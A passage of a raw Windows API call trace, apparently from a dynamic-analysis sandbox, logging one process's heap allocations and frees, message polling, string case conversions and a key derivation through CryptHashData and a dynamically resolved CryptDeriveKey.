[0253.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0253.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0253.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0253.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0253.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0253.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0253.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0253.664] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0253.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0253.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0253.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0253.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0253.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0253.665] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0253.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0253.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0253.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0253.665] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.665] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0253.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0253.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0253.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0253.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0253.665] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.665] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.668] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0253.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0253.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0253.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0253.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0253.668] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0253.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0253.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0253.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0253.669] CryptHashData (hHash=0xaa57a0, pbData=0x24b17c8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0253.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0253.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0253.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0253.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0253.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0253.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0253.669] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0253.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0253.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0253.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0253.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0253.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0253.670] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.670] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0253.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0253.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0253.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0253.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0253.670] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.670] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0253.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0253.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0253.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0253.670] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.670] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.670] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0253.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0253.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0253.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0253.671] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0253.671] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0253.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0253.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0253.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0253.671] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0253.671] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.671] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0253.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0253.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0253.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0253.672] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0253.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0253.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0253.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0253.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0253.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0253.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0253.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0253.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0253.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0253.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0253.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0253.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0253.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0253.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0253.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0253.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0253.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x34aab20, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0253.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0253.674] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0253.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0253.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0253.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0253.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0253.674] CryptDeriveKey (in: hProv=0xad31c0, Algid=0x6601, hBaseData=0xaa57a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5920) returned 1 [0253.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0253.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0253.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0253.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0253.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0253.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0253.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0253.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0253.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0253.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0253.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0253.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0253.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0253.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0253.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0253.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0253.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0253.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0253.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0253.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0253.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0253.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0253.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0253.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0253.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0253.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0253.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0253.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0253.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0253.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0253.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0253.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0253.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0253.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0253.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0253.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0253.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0253.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0253.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0253.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0253.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0253.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0253.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0253.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0253.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0253.677] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0253.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0253.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0253.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0253.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0253.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.678] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0253.678] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0253.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0253.678] HeapFree (in: 